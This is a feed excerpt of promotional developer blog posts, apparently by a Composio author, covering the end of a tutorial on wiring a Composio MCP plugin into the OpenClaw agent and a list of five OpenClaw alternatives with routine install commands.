&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdpsvm2sy8geqomwkr1ri.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdpsvm2sy8geqomwkr1ri.png" alt="OpenClaw loading Composio plugins" width="800" height="219"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If the plugin shows as &lt;strong&gt;"loaded"&lt;/strong&gt;, you can now successfully access Composio.&lt;/p&gt;

&lt;p&gt;Here's how it works:&lt;/p&gt;

&lt;p&gt;The plugin connects to Composio's MCP server at &lt;code&gt;https://connect.composio.dev/mcp&lt;/code&gt; and registers all available tools directly into the OpenClaw agent. Tools are called by name. No extra search or execute steps needed.&lt;/p&gt;

&lt;p&gt;If a tool returns an auth error, the agent will prompt you to connect that toolkit at &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Here's how the configuration looks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"plugins"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"entries"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"composio"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"enabled"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"config"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"consumerKey"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ck_your_key_here"&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can configure the following options directly from the config file:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;enabled&lt;/code&gt;: enable or disable the plugin&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;consumerKey&lt;/code&gt;: your Composio consumer key&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;mcpUrl&lt;/code&gt;: the MCP server URL. By default, it's &lt;code&gt;https://connect.composio.dev/mcp&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Previously, you had to configure API keys per integration, but with Composio you don't have to worry about any of that. Just make sure &lt;strong&gt;not to leak&lt;/strong&gt; the consumer key we generated.&lt;/p&gt;
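&lt;p&gt;One cheap habit that helps with that: keep the key in a file only your user can read, and substitute it into commands instead of pasting it inline. The path and value below are illustrative; the &lt;code&gt;config set&lt;/code&gt; command is the one from step 2:&lt;/p&gt;

```shell
# Store the key once, readable only by your user (illustrative path and value).
printf '%s' 'ck_your_key_here' > /tmp/composio_key
chmod 600 /tmp/composio_key

# Reference it via command substitution so the raw key stays out of scripts
# and configs you might share, e.g.:
#   openclaw config set plugins.entries.composio.config.consumerKey "$(cat /tmp/composio_key)"
cat /tmp/composio_key
```

&lt;p&gt;In a real setup, put the file somewhere like &lt;code&gt;~/.config&lt;/code&gt; rather than &lt;code&gt;/tmp&lt;/code&gt;.&lt;/p&gt;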

&lt;p&gt;And it's that simple. Everything works out of the box as you would use any other OpenClaw plugins!&lt;/p&gt;

&lt;p&gt;Now, to test if it works, head over to the Control UI chat and send a message, something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;“List the Composio tools you have available. Only print the result here”&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgllla2gksya8b9btu9pq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgllla2gksya8b9btu9pq.png" alt="OpenClaw chat session" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If it asks you to connect the tools, head over to &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt; and connect each of the tools you require. It's as simple as clicking &lt;strong&gt;Connect&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkw7pva65r9ghx9vngi1g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkw7pva65r9ghx9vngi1g.png" alt="Composio Integrations" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;All the integrations you use are OAuth-hosted, and only the tools you connect will be available to OpenClaw. Nothing more than that.&lt;/p&gt;




&lt;h2&gt;
  
  
  Wrap Up!
&lt;/h2&gt;

&lt;p&gt;OpenClaw is really useful for some people (not everyone), but it’s also risky. It can touch your files, run commands, and pull in third-party skills, which can &lt;strong&gt;include malware&lt;/strong&gt;, as we discussed. It’s a local agent gateway with access to everything: your filesystem, your shell, and whatever credentials you put into it. That power is the whole point, and it’s also the danger.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhnhhnc4jpxr7gwxosedq.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhnhhnc4jpxr7gwxosedq.gif" alt="With great power comes great responsibility GIF" width="480" height="256"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So if you’re going to use it, seriously consider &lt;strong&gt;OAuth-hosted safe integrations&lt;/strong&gt; instead of pasting API keys everywhere. It’s an easy way to reduce the chance of a disaster.&lt;/p&gt;

&lt;p&gt;And, if you're looking for some secure alternatives, you can find them here: &lt;a href="https://composio.dev/blog/openclaw-alternatives" rel="noopener noreferrer"&gt;Top 5 Secure OpenClaw Alternatives&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That’s it for this post. Hope it helped, and I’ll see you next time. ✌️&lt;/p&gt;

</description>
      <category>ai</category>
      <category>productivity</category>
      <category>tutorial</category>
      <category>opensource</category>
    </item>
    <item>
      <title>🖐️Top 5 secure OpenClaw Alternatives you should consider 👀</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Tue, 17 Feb 2026 12:59:41 +0000</pubDate>
      <link>https://forem.com/composiodev/top-5-secure-openclaw-alternatives-you-should-consider-172p</link>
      <guid>https://forem.com/composiodev/top-5-secure-openclaw-alternatives-you-should-consider-172p</guid>
      <description>&lt;p&gt;OpenClaw is everywhere right now, and I get the hype. I’ve been seeing it all over my feed lately, and it’s clearly clicking with a lot of people. 👌&lt;/p&gt;

&lt;p&gt;After using it for quite some time myself, though, I find it a bit too noisy, and not every tool works the same way for every person.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7j8wyae4kp66m1etga3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7j8wyae4kp66m1etga3.png" alt="OpenClaw tweets"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Whenever something starts trending this hard, it’s a good excuse to look around, especially if you’re after something more minimal.&lt;/p&gt;

&lt;p&gt;And now, OpenClaw may soon get its 4th rename, to &lt;strong&gt;Closed&lt;/strong&gt;Claw. 🤷‍♂️ You never know with OpenAI.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcu5w8ex4icind6gwy2ph.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcu5w8ex4icind6gwy2ph.png" alt="OpenClaw joining OpenAI tweet"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Why OpenClaw alternatives?
&lt;/h2&gt;

&lt;p&gt;OpenClaw is super powerful, no doubt, but it comes with two big headaches, and you've probably already felt them yourself.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Security&lt;/li&gt;
&lt;li&gt;Setup Friction&lt;/li&gt;
&lt;/ul&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Security&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;When your agent can read files, run shell commands, and pull in third-party “skills,” you are basically giving it the keys to your machine. The skill marketplace has already turned into a real problem, with researchers finding &lt;strong&gt;hundreds of malicious skills&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;If you are not auditing everything you install, it is easy to get yourself cooked.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F170ua87mrfkafsw3pmx7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F170ua87mrfkafsw3pmx7.png" alt="OpenClaw marketplace found to have malwares"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol start="2"&gt;
&lt;li&gt;&lt;strong&gt;Setup Friction&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The “self-host it and wire up” path is fun if you like tinkering, but it is also where most people get stuck. You end up handling gateways, background services, tokens, and permission issues (most of the time).&lt;/p&gt;

&lt;p&gt;And most people won't use every feature that ships with the bloated app, just a few, so an alternative can often be a good choice.&lt;/p&gt;

&lt;p&gt;Below are five OpenClaw alternatives that can cover the same ground, often with a smoother and more minimal experience, depending on what you’re building.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. &lt;a href="https://www.trustclaw.app/" rel="noopener noreferrer"&gt;TrustClaw&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Rebuilt from scratch on OpenClaw's idea, with &lt;strong&gt;1000+ tools&lt;/strong&gt; and a focus on security.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fygoq325t5h7exrxk46y4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fygoq325t5h7exrxk46y4.png" alt="TrustClaw by Composio"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;TrustClaw is for those who like the idea of OpenClaw but don't want to run it locally and hand over their passwords to the agent.&lt;/p&gt;

&lt;p&gt;It's built by the &lt;strong&gt;Composio team&lt;/strong&gt;, and the pitch is basically: you get an agent that is available 24/7 and capable of taking real actions across a vast number of apps (500+), but the risky parts, like credentials and code execution, are handled in a more controlled way.&lt;/p&gt;

&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;OAuth-only auth:&lt;/strong&gt; You connect apps the normal way (OAuth), so you are not pasting API keys or passwords into config files.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sandboxed execution by default:&lt;/strong&gt; Every action runs in an isolated cloud environment that disappears when the task finishes. So you are not running “agent code” locally with your permissions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Managed tool surface:&lt;/strong&gt; Instead of pulling random community “skills” from a public registry, TrustClaw uses Composio’s managed integrations and tooling.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit trails + kill switch:&lt;/strong&gt; It keeps a full action log, and you can revoke access with one click if you ever need to.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The last point is important because agent toolchains are a real security risk right now. In these marketplaces, a single random add-on can trick you into running malware, and it has already happened. Ref: &lt;a href="https://www.theverge.com/news/874011/openclaw-ai-skill-clawhub-extensions-security-nightmare" rel="noopener noreferrer"&gt;OpenClaw’s AI ‘skill’ extensions are a security nightmare&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The kind of prompts it’s built for
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;“Handle my customer complaints and log in Notion”&lt;/p&gt;

&lt;p&gt;It finds the right tools, fetches emails, creates drafts, and writes Notion pages (using tools such as: &lt;code&gt;GMAIL_FETCH_EMAILS&lt;/code&gt;, &lt;code&gt;GMAIL_CREATE_DRAFT&lt;/code&gt;, &lt;code&gt;NOTION_CREATE_PAGE&lt;/code&gt;).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;“Pull all Reddit threads mentioning [competitor] from the last 3 months, analyze sentiment...”&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;“Summarize all Slack messages in #product-feedback from this week...”&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Why it’s comparatively better (for most of you)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Setup in seconds&lt;/strong&gt; (vs. 30 to 60 minutes of tunnels and local setup)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Encrypted credentials&lt;/strong&gt; managed by Composio (vs. plaintext local config)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remote sandbox&lt;/strong&gt; (vs. local machine execution)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Managed tool surface&lt;/strong&gt; (vs. unvetted public skill registry)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Action logs + one-click revocation&lt;/strong&gt; (vs. digging through config files)&lt;/li&gt;
&lt;li&gt;and no need for &lt;strong&gt;Mac Mini&lt;/strong&gt; 🤷‍♂️&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Quick start
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Go to TrustClaw and hit &lt;a href="https://www.trustclaw.app/login" rel="noopener noreferrer"&gt;Get Started&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Connect the apps you want (OAuth flow).&lt;/li&gt;
&lt;li&gt;Give it a task in plain language, or schedule one to run while you are offline.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here's a demo: 👇&lt;/p&gt;

&lt;p&gt;

&lt;iframe class="tweet-embed" id="tweet-2022518658048888916-653" src="https://platform.twitter.com/embed/Tweet.html?id=2022518658048888916"&gt;
&lt;/iframe&gt;






&lt;/p&gt;

&lt;p&gt;It's that simple. You now have an OpenClaw-style agent that runs completely in the cloud, with managed permissions and only the tools you require.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. &lt;a href="https://zeroclaw.org/" rel="noopener noreferrer"&gt;ZeroClaw&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Written in Rust, it runs even on $10 hardware with &amp;lt;5MB RAM.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F576jdieqv0887vp0iv2r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F576jdieqv0887vp0iv2r.png" alt="ZeroClaw - OpenClaw alternative"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;ZeroClaw keeps the agent stack lean. Instead of a big local setup with lots of moving parts, you get a lightweight Rust binary that starts fast and runs comfortably on cheap hardware. If you care more about speed, stability, and low resource use, this one hits the sweet spot.&lt;/p&gt;

&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Ultra lightweight:&lt;/strong&gt; designed to keep CPU and RAM usage low.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Quick boot:&lt;/strong&gt; fast startup, good for bots and always-on tasks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Modular:&lt;/strong&gt; swap models, memory, tools, and channels without rewriting everything.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Why pick it over OpenClaw?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;You want something minimal and predictable.&lt;/li&gt;
&lt;li&gt;You’re running on a small VPS / Raspberry Pi / home lab.&lt;/li&gt;
&lt;li&gt;You don’t need a huge plugin marketplace; you need a tool that just runs.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Quick Start
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/zeroclaw-labs/zeroclaw.git
&lt;span class="nb"&gt;cd &lt;/span&gt;zeroclaw
cargo build &lt;span class="nt"&gt;--release&lt;/span&gt;
cargo &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;--path&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="nt"&gt;--force&lt;/span&gt;

&lt;span class="c"&gt;# quick setup with openrouter&lt;/span&gt;
zeroclaw onboard &lt;span class="nt"&gt;--api-key&lt;/span&gt; sk-... &lt;span class="nt"&gt;--provider&lt;/span&gt; openrouter

&lt;span class="c"&gt;# chat&lt;/span&gt;
zeroclaw agent &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"Hello, ZeroClaw!"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
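&lt;p&gt;Since it boots fast and stays light, ZeroClaw is a natural fit for an always-on service. Here's a minimal sketch of a user-level systemd unit; the binary path and the &lt;code&gt;zeroclaw agent&lt;/code&gt; invocation are assumptions based on the quick start above, so adjust them to your install:&lt;/p&gt;

```shell
# Sketch only: the ExecStart path and flags are assumptions, not an official unit.
mkdir -p ~/.config/systemd/user
cat > ~/.config/systemd/user/zeroclaw.service <<'EOF'
[Unit]
Description=ZeroClaw agent (sketch)
After=network-online.target

[Service]
ExecStart=%h/.cargo/bin/zeroclaw agent
Restart=on-failure
RestartSec=5

[Install]
WantedBy=default.target
EOF
```

&lt;p&gt;Then run &lt;code&gt;systemctl --user daemon-reload&lt;/code&gt; followed by &lt;code&gt;systemctl --user enable --now zeroclaw&lt;/code&gt;.&lt;/p&gt;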

&lt;h2&gt;
  
  
  3. &lt;a href="https://github.com/qwibitai/nanoclaw" rel="noopener noreferrer"&gt;NanoClaw&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ An OpenClaw alternative that runs entirely in a container for security.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ddtqk8ramy5wd0zd0si.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ddtqk8ramy5wd0zd0si.png" alt="NanoClaw - OpenClaw alternative"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;NanoClaw offers much the same experience but runs fully isolated inside a container. The idea is simple: keep the codebase small, and put the risky parts (bash, file access, tools) inside an isolated container so the agent can only touch what you explicitly mount.&lt;/p&gt;
&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Container isolation by default:&lt;/strong&gt; runs in Apple Container (macOS) or Docker (macOS/Linux), with filesystem isolation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Per-chat sandboxing:&lt;/strong&gt; each group/chat can have its own memory and its own mounted filesystem, separated from others.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Built on Anthropic’s Agents SDK:&lt;/strong&gt; it’s basically designed to work nicely with Claude’s agent tooling and Claude Code.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;WhatsApp + scheduled jobs:&lt;/strong&gt; message it from your phone, and set recurring tasks that ping you back.&lt;/li&gt;
&lt;/ul&gt;
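&lt;p&gt;The isolation model boils down to "mount only what the agent may touch." Here's a generic illustration of that idea; the image name and paths are made up, since NanoClaw's &lt;code&gt;/setup&lt;/code&gt; flow generates the real configuration:&lt;/p&gt;

```shell
# Illustrative only: "nanoclaw:latest" and the paths are placeholders.
# The single bind mount is the only host directory the container can see;
# bash, file access, and tools inside it cannot reach anything else.
docker run --rm \
  -v "$HOME/agent-workspace:/workspace" \
  -w /workspace \
  nanoclaw:latest
```

&lt;p&gt;Anything outside &lt;code&gt;~/agent-workspace&lt;/code&gt; simply doesn't exist from the agent's point of view.&lt;/p&gt;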
&lt;h3&gt;
  
  
  Quick start
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/gavrielc/nanoclaw.git
&lt;span class="nb"&gt;cd &lt;/span&gt;nanoclaw
claude
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Then run &lt;code&gt;/setup&lt;/code&gt;. Claude Code handles everything: dependencies, authentication, container setup, and service configuration.&lt;/p&gt;

&lt;p&gt;Here's a quick demo: 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/AQ5uiLyr8bQ"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;
&lt;h2&gt;
  
  
  4. &lt;a href="https://github.com/HKUDS/nanobot" rel="noopener noreferrer"&gt;nanobot&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Ultra lightweight AI assistant built with Python.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6pidyqqtzljh9u1j5fx3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6pidyqqtzljh9u1j5fx3.png" alt="nanobot - OpenClaw alternative"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Nanobot, as the name suggests, is quite small. The core agent is about ~4,000 lines of code, and the repo even publishes a live count you can verify with their script. That is the whole vibe: small enough that you can actually read it, trust it, and change it.&lt;/p&gt;
&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Core size metric:&lt;/strong&gt; ~4,000 LOC, with a “real-time” line count shown in the README (and a script to verify).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;MCP support (fresh):&lt;/strong&gt; added 2026-02-14, so it can plug into MCP tool servers without you reinventing the plumbing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runs where you already are:&lt;/strong&gt; built-in “gateway” mode supports a bunch of chat surfaces like Telegram, Discord, WhatsApp, Slack, Email, and more.&lt;/li&gt;
&lt;/ul&gt;
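&lt;p&gt;You can reproduce that kind of count with a generic one-liner. The directory layout below is invented for illustration; nanobot's own script may include a different set of files:&lt;/p&gt;

```shell
# Create a tiny fake package, then count its non-blank Python lines.
mkdir -p demo/nanobot
printf 'def main():\n    pass\n\n' > demo/nanobot/agent.py
printf 'VERSION = "0.1"\n' > demo/nanobot/version.py
loc=$(find demo/nanobot -name '*.py' -print0 | xargs -0 cat | grep -vc '^[[:space:]]*$')
echo "core LOC: $loc"   # 3 for this toy package
```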
&lt;h3&gt;
  
  
  Quick Start
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;nanobot-ai

nanobot onboard
nanobot agent          &lt;span class="c"&gt;# local interactive chat&lt;/span&gt;
nanobot gateway        &lt;span class="c"&gt;# run it as a chat bot (Telegram, Discord, WhatsApp, etc)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Here's a quick architecture:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqmi9wen3bpya82ck9gyz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqmi9wen3bpya82ck9gyz.png" alt="nanobot architecture"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's a video to give you an idea of how it works: 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/18WGbR6GYn0"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;
&lt;h2&gt;
  
  
  5. &lt;a href="https://memu.bot/" rel="noopener noreferrer"&gt;memU Bot&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ A 24/7 proactive agent built for long-running use.&lt;/p&gt;
&lt;/blockquote&gt;

